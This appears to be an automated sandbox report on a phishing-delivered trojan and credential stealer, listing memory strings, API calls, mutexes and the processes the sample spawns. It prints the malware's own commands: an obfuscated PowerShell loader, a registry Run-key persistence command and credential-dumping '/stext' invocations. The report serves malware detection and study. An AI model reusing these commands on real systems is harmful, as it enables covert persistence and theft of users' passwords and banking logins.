            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019679969.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019730617.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: lftebevgelserne.exe, 0000000E.00000003.2019679969.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019730617.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: lftebevgelserne.exe, 00000005.00000002.3974075181.000000001F200000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: lftebevgelserne.exe, 00000005.00000002.3974075181.000000001F200000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: lftebevgelserne.exe, 0000000C.00000002.2040515314.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: lftebevgelserne.exe, 0000000C.00000002.2040920851.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000003.2040286769.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2041614154.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: lftebevgelserne.exe, 0000000C.00000002.2040920851.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: lftebevgelserne.exe, 0000000C.00000002.2040920851.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: lftebevgelserne.exe, 0000000C.00000002.2040920851.00000000004E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=b
            Source: lftebevgelserne.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: lftebevgelserne.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 5744, type: MEMORYSTR

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040326A
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_004066E20_2_004066E2
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_00404AF50_2_00404AF5
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_004066E25_2_004066E2
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_00404AF55_2_00404AF5
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F2471945_2_1F247194
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F23B5C15_2_1F23B5C1
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044B04012_2_0044B040
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0043610D12_2_0043610D
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044731012_2_00447310
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044A49012_2_0044A490
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040755A12_2_0040755A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0043C56012_2_0043C560
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044B61012_2_0044B610
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044D6C012_2_0044D6C0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004476F012_2_004476F0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044B87012_2_0044B870
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044081D12_2_0044081D
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0041495712_2_00414957
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004079EE12_2_004079EE
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00407AEB12_2_00407AEB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044AA8012_2_0044AA80
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00412AA912_2_00412AA9
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00404B7412_2_00404B74
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00404B0312_2_00404B03
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044BBD812_2_0044BBD8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00404BE512_2_00404BE5
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00404C7612_2_00404C76
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00415CFE12_2_00415CFE
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00416D7212_2_00416D72
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00446D3012_2_00446D30
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00446D8B12_2_00446D8B
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00406E8F12_2_00406E8F
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0040503813_2_00405038
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0041208C13_2_0041208C
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004050A913_2_004050A9
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0040511A13_2_0040511A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0043C13A13_2_0043C13A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004051AB13_2_004051AB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044930013_2_00449300
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0040D32213_2_0040D322
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044A4F013_2_0044A4F0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0043A5AB13_2_0043A5AB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0041363113_2_00413631
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044669013_2_00446690
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044A73013_2_0044A730
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004398D813_2_004398D8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004498E013_2_004498E0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044A88613_2_0044A886
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0043DA0913_2_0043DA09
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00438D5E13_2_00438D5E
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00449ED013_2_00449ED0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0041FE8313_2_0041FE83
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00430F5413_2_00430F54
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004050C214_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004014AB14_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_0040513314_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004051A414_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_0040124614_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_0040CA4614_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_0040523514_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004032C814_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004222D914_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_0040168914_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00402F6014_2_00402F60
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: String function: 00416760 appears 69 times
            Source: Priority_Quote_Request_Items_List.exe, 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametkningens.exe4 vs Priority_Quote_Request_Items_List.exe
            Source: Priority_Quote_Request_Items_List.exeBinary or memory string: OriginalFilenametkningens.exe4 vs Priority_Quote_Request_Items_List.exe
            Source: Priority_Quote_Request_Items_List.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/16@2/3
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040326A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404579
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,12_2_00413D4C
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeFile created: C:\Users\user\AppData\Roaming\thrombopeniaJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1512:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-QGLBE0
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeFile created: C:\Users\user\AppData\Local\Temp\nscB712.tmpJump to behavior
            Source: Priority_Quote_Request_Items_List.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: lftebevgelserne.exe, 00000005.00000002.3973779760.000000001F110000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: lftebevgelserne.exe, 0000000C.00000002.2041432334.0000000000977000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeFile read: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33207
            Source: unknownProcess created: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe "C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe"
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\lmkhnkgtxjjxcrnotizi"
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\ngpzfdrvkrbkmxjsctukugj"
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\xivkgncoyztpolxwtdgdfsekyz"
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe "C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\lmkhnkgtxjjxcrnotizi"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\ngpzfdrvkrbkmxjsctukugj"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\xivkgncoyztpolxwtdgdfsekyz"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"Jump to behavior
